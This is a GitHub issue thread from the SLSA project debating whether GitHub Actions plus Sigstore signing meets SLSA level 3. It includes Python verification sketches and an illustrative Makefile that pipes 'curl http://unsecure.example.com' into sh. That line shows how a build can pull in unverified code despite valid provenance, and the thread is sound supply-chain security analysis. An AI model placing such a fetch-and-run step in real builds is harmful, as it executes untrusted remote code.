slsa-framework / slsa

Supply-chain Levels for Software Artifacts
https://slsa.dev

Applied ruling: does signing with GitHub+Sigstore satisfy SLSA 3? #464

Closed MarkLodato closed 2 years ago

MarkLodato commented 2 years ago

GitHub Actions + Sigstore can be used to sign artifacts with an X.509 certificate containing the workflow's identity (repository + path + branch/tag). This works by having the workflow request a GitHub Actions OpenID Connect (OIDC) token and then converting that to X.509 using Fulcio. It is not possible for a user to forge the corresponding fields in the X.509 certificate. For a concrete example, see Sigstore integration in the npm CLI (https://github.com/npm/rfcs/pull/626).
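To make the identity fields concrete, here is a minimal sketch of how a verifier might split the certificate's Subject Alternative Name into repository, workflow path, and ref. It assumes the SAN is a URI of the form `https://github.com/OWNER/REPO/.github/workflows/FILE@REF`; that layout, and the names `WorkflowIdentity` and `parse_workflow_san`, are assumptions for illustration, not something defined in this thread.

```python
import re
from typing import NamedTuple


class WorkflowIdentity(NamedTuple):
    repository: str     # e.g. "lodash/lodash"
    workflow_path: str  # e.g. ".github/workflows/release-build.yaml"
    ref: str            # e.g. "refs/tags/v1.0.0"


# Assumed SAN layout: https://github.com/OWNER/REPO/.github/workflows/FILE@REF
_SAN_PATTERN = re.compile(
    r"^https://github\.com/"
    r"(?P<repo>[^/]+/[^/]+)/"
    r"(?P<path>\.github/workflows/[^@]+)"
    r"@(?P<ref>refs/.+)$"
)


def parse_workflow_san(san_uri: str) -> WorkflowIdentity:
    """Split a workflow identity URI into repository, workflow path, and ref."""
    match = _SAN_PATTERN.match(san_uri)
    if match is None:
        raise ValueError(f"not a recognized workflow identity: {san_uri!r}")
    return WorkflowIdentity(match["repo"], match["path"], match["ref"])
```

A verifier would call this only after the certificate chain and signature have been checked; the parsing itself proves nothing about authenticity.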

For the sake of simplicity, let's say that the "provenance" is an in-toto attestation that just contains a subject but no predicate. All of the provenance information is found in the X.509 certificate. (Note: This is not what is being proposed in the npm RFC.)
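As a rough illustration of that hypothetical, a subject-only statement could be built as below. The `_type` value is the in-toto Statement v0.1 identifier; the function name and the decision to omit `predicateType` and `predicate` entirely are assumptions made to match the thought experiment, not a recommended format.

```python
import hashlib
import json


def subject_only_statement(artifact_name: str, artifact_bytes: bytes) -> dict:
    """Build a statement that binds an artifact digest and nothing else."""
    digest = hashlib.sha256(artifact_bytes).hexdigest()
    return {
        "_type": "https://in-toto.io/Statement/v0.1",
        "subject": [{"name": artifact_name, "digest": {"sha256": digest}}],
        # Deliberately no predicateType / predicate: in this hypothetical,
        # all provenance information lives in the X.509 certificate.
    }


if __name__ == "__main__":
    statement = subject_only_statement("example.tgz", b"example artifact contents")
    print(json.dumps(statement, indent=2))
```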

Question: Does this satisfy SLSA 3?

I believe the Build requirements are plainly satisfied, aside from the questions in #321.

What about the Provenance requirements?

| Requirement | Met? |
| --- | --- |
| Available | Yes |
| Authenticated | Yes, by verification via Sigstore |
| Service generated | Yes, by GitHub Actions + Sigstore |
| Non-falsifiable | Yes, the user cannot modify anything but the output hash (subject) |
| Identifies artifact | Yes, subject |
| Identifies builder | Yes, GitHub Actions (though it doesn't identify the runner, see #321) |
| Identifies build instructions | (redundant with Identifies entry point, see #388) |
| Identifies source code | Yes, the repository in Subject Alternative Name |
| Identifies entry point | Yes, the path to the workflow within the Subject Alternative Name |
| Includes all build parameters | Yes, if the event_name is not "workflow_dispatch", there are no parameters |

By this analysis, this does indeed satisfy SLSA 3. Am I missing something? Any agreement or disagreement?

I ask because I'm having trouble explaining the benefit of https://github.com/slsa-framework/slsa-github-generator over this, specifically in the context of the npm RFC above. If both are SLSA 3, why is the reusable workflow more secure?

/cc @mlieberman85 @laurentsimon @ianlewis

kommendorkapten commented 2 years ago

My $.02 on this:

What a trusted builder, audited and vetted by a trusted entity, provides is scalability around trust (this is not strictly related to SLSA, but I'll get to that). A "regular" workflow defined in the same repository as the code does not have to be any less secure than builder_go_slsa3.yml. But from a consumer perspective (this could be a registry, build system or a developer), a reusable workflow allows me to create a fairly simple policy around which builders I trust at a given SLSA level. Compare this with every dependency using its own workflow (builder). Helpful here is that the identity of the builder is encoded in the SAN in the X.509 certificate, i.e. it is not falsifiable by a developer.
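To illustrate what such a "fairly simple policy" might look like, here is a minimal sketch: a consumer keeps a small allowlist of builder workflows and the SLSA level it is willing to grant each one. The policy contents, the `meets_policy` helper, and the `workflow@ref` identity format are all hypothetical; a real policy would probably also pin the allowed refs.

```python
from typing import Mapping

# Hypothetical consumer policy: builder workflow -> highest SLSA level trusted.
EXAMPLE_POLICY: Mapping[str, int] = {
    "slsa-framework/slsa-github-generator/.github/workflows/builder_go_slsa3.yml": 3,
}


def trusted_level(builder_id: str, policy: Mapping[str, int]) -> int:
    """Return the level granted to a builder identity, or 0 if it is unknown."""
    # Assumed identity format "OWNER/REPO/PATH@REF"; the ref is ignored here.
    workflow, _, _ref = builder_id.partition("@")
    return policy.get(workflow, 0)


def meets_policy(builder_id: str, required_level: int, policy: Mapping[str, int]) -> bool:
    """True if the builder named in the certificate is trusted at the required level."""
    return trusted_level(builder_id, policy) >= required_level
```

With one shared builder the allowlist stays a single entry no matter how many packages use it; with per-repository workflows every dependency would need its own audited entry.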

So with a trusted builder, we get separation of concerns: the build and provenance generation are separated from the source code. The source code can be modified by the developer (any attempt to replace the builder will be made visible in the certificate), but the trusted builder cannot. If there is a policy around a specific builder defined in the source code repository, where a builder is audited and trusted, what would that look like? We can't rely on a commit SHA, as it will change with each commit, and there is no guarantee that the builder was not modified. For a trusted builder, an immutable identifier, such as a specific commit SHA, can be audited and approved, and reused across any number of source code repositories.

And who is in charge of creating the provenance? If it's a workflow in the source code repository (which the developer has access to), my understanding is that this breaks provenance/non-falsifiable and possibly even provenance/service-generated. I get that the initial information is not falsifiable, as it comes from the builder's ID token and gets encoded into the cert. But this does not, IMHO, give any guarantee about the real provenance of the created artifact, as the build job can freely pull from another source repo and build from that.

asraa commented 2 years ago

Another small addition:

> I ask because I'm having trouble explaining the benefit of https://github.com/slsa-framework/slsa-github-generator over this, specifically in the context of the npm RFC above. If both are SLSA 3, why is the reusable workflow more secure?

As @kommendorkapten mentioned, with a reusable workflow, the build and provenance are isolated from the maintainer. Yes, you can achieve "SLSA 3" for the input hash and an empty provenance statement, but no other information in your attestation is non-falsifiable.

For example, without a reusable workflow, the contents of your buildConfig are falsifiable by the maintainer of the project.

> And who is in charge of creating the provenance? If it's a workflow in the source code repository (which the developer has access to), my understanding is that this breaks provenance/non-falsifiable and possibly even provenance/service-generated.

Agreed. Basically, if any fields are present beyond the information in the Fulcio certificate and the Subject name, then we won't satisfy SLSA 3, in my opinion. Likewise, as mentioned, this provides no strong guarantee on the artifact "recipe" and only provides a "SLSA 3" style endorsement of the artifact. The build step could have performed a curl to retrieve any artifact.

Basically, I think an empty SLSA provenance with no predicate is effectively the same as a raw signature.

> provides is scalability around trust (this is not strictly related to SLSA, but I'll get to that).

+1, I suppose the value of using "provenance generator" workflows (rather than "builder" workflows that are aware of the build) would be that it provides a method of consumer policy verification against a known set of builders and easy maintenance for the developers.

laurentsimon commented 2 years ago

The builder is SLSA level 3, but the resulting artifact may not be due to self-hosted runners. During verification, you'd need to fetch the workflow and verify that it's not using self-hosted runners.

We discussed getting rid of in-toto and adding a hash into the certificate in https://github.com/sigstore/fulcio/issues/475, but this is limited because the OIDC token cannot pack a lot of information and we don't control it.

So it depends on use case:

If you care only about binding a package to a repo (provenance level 3) and you don't mind an X.509-formatted attestation, then using the X.509 cert as the attestation is enough. (We do that in the scorecard Action to stream the results back to our servers, but we parse the workflow and verify there are no self-hosted runners, no use of custom containers or services, etc.) In terms of adoption, this is ideal because it suffices for a CLI (npm, maven) to sign when it detects it's running in a GitHub workflow. There are no changes needed for maintainers.
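The workflow checks mentioned above could be sketched roughly as follows. This is not the scorecard Action's actual code; it assumes the workflow YAML has already been fetched and parsed into a plain dict by some YAML parser, and `workflow_violations` is a hypothetical helper that covers only the three checks named in the paragraph.

```python
from typing import Any, Dict, List


def workflow_violations(workflow: Dict[str, Any]) -> List[str]:
    """List the jobs that use self-hosted runners, custom containers, or services."""
    problems: List[str] = []
    for job_name, job in workflow.get("jobs", {}).items():
        runs_on = job.get("runs-on", [])
        # "runs-on" is handled here as a single label or a list of labels;
        # other forms are not covered by this sketch.
        labels = [runs_on] if isinstance(runs_on, str) else list(runs_on)
        if "self-hosted" in labels:
            problems.append(f"{job_name}: uses a self-hosted runner")
        if "container" in job:
            problems.append(f"{job_name}: uses a custom container")
        if "services" in job:
            problems.append(f"{job_name}: uses services")
    return problems
```

An empty result means none of the three conditions was detected; it says nothing about what the job's steps actually execute.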

The re-usable workflow has the following advantages:

The two approaches seem complementary. The former gives you provenance level 3 (build level 3 is contingent on parsing the workflow during verification, which is cumbersome for egress rules and latency); the latter gives flexibility and finer-grained information for build level 3 / re-builders / policies.

asraa commented 2 years ago

> you get level 3 for build without the need to fetch / parse a workflow

Big +1 here. The value of having a SLSA 3 attestation here is that we can trust properties of the build and provenance without needing to fetch or parse the workflow, or to be aware of GH or other CI/CD systems themselves.

A consumer may be able to prove SLSA 3 compliance from an empty predicate by doing some work. However, that means they must fetch, parse, and validate the SLSA properties themselves. The real value of these builders is that consumers CAN use the trusted information packaged in the SLSA provenance to verify policy, re-build, or verify properties WITHOUT figuring them out themselves, which is almost unachievable in general given every way people may build artifacts.

MarkLodato commented 2 years ago

Thanks all! That's very helpful to clarify the benefits of the reusable workflow over the raw OIDC/Sigstore model.

But I'm going to be a bit pedantic in order to nail down the bare minimum to satisfy SLSA 3. As I read the v0.1 requirements, I don't see anything that precludes a workflow from fetching and building other sources, nor do I see anything that would require fetching and parsing the workflow to verify.

Let's consider a concrete but hypothetical example: NPM package lodash is expected to be built from https://github.com/lodash/lodash. Suppose that it contains a GitHub Actions workflow .github/workflows/release-build.yaml that actually fetches the sources from some other git repo and doesn't use any code in the lodash repo itself.

What specific SLSA 3 requirement would that fail to meet, and why would using generator_generic_slsa3.yml make a difference?

I am asking this to validate whether the SLSA requirements are properly designed. If the consensus is that this feels wrong, then perhaps we should add some other requirement to differentiate between these two types of builders. If the consensus is that this is acceptable, and that there is naturally some variance in guarantees between builders, that's OK too - it's good to document. Or maybe I'm just missing something that's already there. :smile:

laurentsimon commented 2 years ago

It does not violate the existing SLSA requirements. I think the question you are asking is generally a source of confusion because the builder cannot assert that the source code was actually "used" to compile, just that the entrypoint of the source code was used. Depending on the level of abstraction at which the builder operates, you get more or less visibility into the underlying commands... and so you also get more or fewer guarantees.

You could think of the x509 builder as a first-stage builder, which is limited but sets the "root of trust". The re-usable workflow would be a second-stage builder (like a full OS, it's richer and has more functionalities).

I don't know if this warrants a change in the SLSA specs though. Because it's a continuous source of confusion, maybe this is something to think about in the SLSA description, i.e. that not all builders are equal. It may be useful to capture these distinctions on slsa.dev, but maybe not in the specs.

Would love to hear others' thoughts.

kommendorkapten commented 2 years ago

> What specific SLSA 3 requirement would that fail to meet, and why would using generator_generic_slsa3.yml make a difference?

I think the first-stage and second-stage builder distinction is a great analogy to use here. For a first-stage/X.509 builder, any workflow/build definition that is "verifiably derived from text file definitions stored in a version control system" can be used. A SLSA level 3 attestation for these kinds of builders must be bare-minimum (X.509 cert + artifact digest), as I understand it.

With a second stage builder, we can get richer attestations, as the provenance generation can be isolated from the source code repository, so we can now put more data into it without violating the "non-falsifiable" requirement.

While they are both SLSA level 3, the discussion boils down to their usability and how to define policies, as policies will most likely be very different for, e.g., a vendor, OSS, and the enterprise use case. I guess it would be hard to tighten up the language in the SLSA spec to accommodate everyone's needs? Would it be worth extending the spec on policies in SLSA (an appendix or similar), and talking more about how different builders may operate, so as to provide more guidelines for downstream verifiers? And maybe talk more about different builders and what they actually attest to?

Another point in the SLSA spec that confuses me, though: build/build as code.

> The build definition and configuration executed by the build service is verifiably derived from text file definitions stored in a version control system.
>
> Verifiably derived can mean either fetched directly through a trusted channel, or that the derived definition has some trustworthy provenance chain linking back to version control.

Consider a GitHub Actions file that has the following job:

name: Example build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: make foo

And the Makefile looks like this:

foo:
    curl http://unsecure.example.com | sh

This is an example scenario we have been discussing internally a lot. You get the X.509 details in your provenance, but the rest is useless from a verification standpoint. So we have been inclined to reason more about second-stage builders, as we think they are more usable in general for the OSS use case.

With that said, I'm not trying to claim that we believe a generic SLSA 3 builder is universally secure, but it moves the needle, and with language specific builders, like the builder_go_slsa3.yml and possibly even integrations with the tool-chain, we can make stronger claims and so simplify the policy construction.

MarkLodato commented 2 years ago

> I think the question you are asking is generally a source of confusion because the builder cannot assert that the source code was actually "used" to compile

Very insightful! It didn't occur to me until you said it. Agreed. Filed #465.

> You could think of the x509 builder as a first-stage builder [...]. The re-usable workflow would be a second-stage builder

I agree that it would be valuable to distinguish between these two types of builders. I suggest that we try to define a precise term for this rather than offering general guidance, so I filed #466. If you disagree please comment!

MarkLodato commented 2 years ago

I'm going to mark this issue as resolved since I think we have our answer, plus follow-up issues (#465 and #466).